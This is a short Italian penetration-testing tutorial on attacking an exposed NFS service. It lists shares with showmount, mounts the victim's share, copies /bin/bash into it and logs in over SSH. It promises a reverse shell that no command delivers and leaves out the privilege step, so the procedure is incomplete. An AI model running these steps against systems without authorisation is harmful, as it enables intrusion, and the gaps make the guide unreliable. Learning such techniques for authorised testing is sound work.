Se durante una scansione ci appare un qualcosa di questo tipo possiamo effettuare un attacco al servizio NFS e provare ad ottenere una reverse shell.
Per prima cosa scarichiamo il programma che ci permette di interagire con il servizio NFS:
sudo apt-get install nfs-commonLancia il seguente comando per vedere se ci sono delle cartelle di condivisione:
showmount -e <Target IP Address>Se il comando precedente restituisce una o più cartelle di condivisione creiamoci una cartella chiamata nfs:
mkdir /tmp/nfsOra montiamo la cartella appena creata sulla macchina vittima con il seguente comando:
sudo mount -t nfs <Target IP Address>:/<Share Directory> /tmp/nfsEsegui i seguenti comandi per visualizzare i dettagli della directory montata e ottenere la proprietà del gruppo nella directory share:
cd /tmp/nfs
sudo cp /bin/bash .
ls -la
Esegui il comando seguente per stabilire una connessione remota con l’host di destinazione utilizzando SSH:
ssh -l <Target Login Name> <Target IP Address>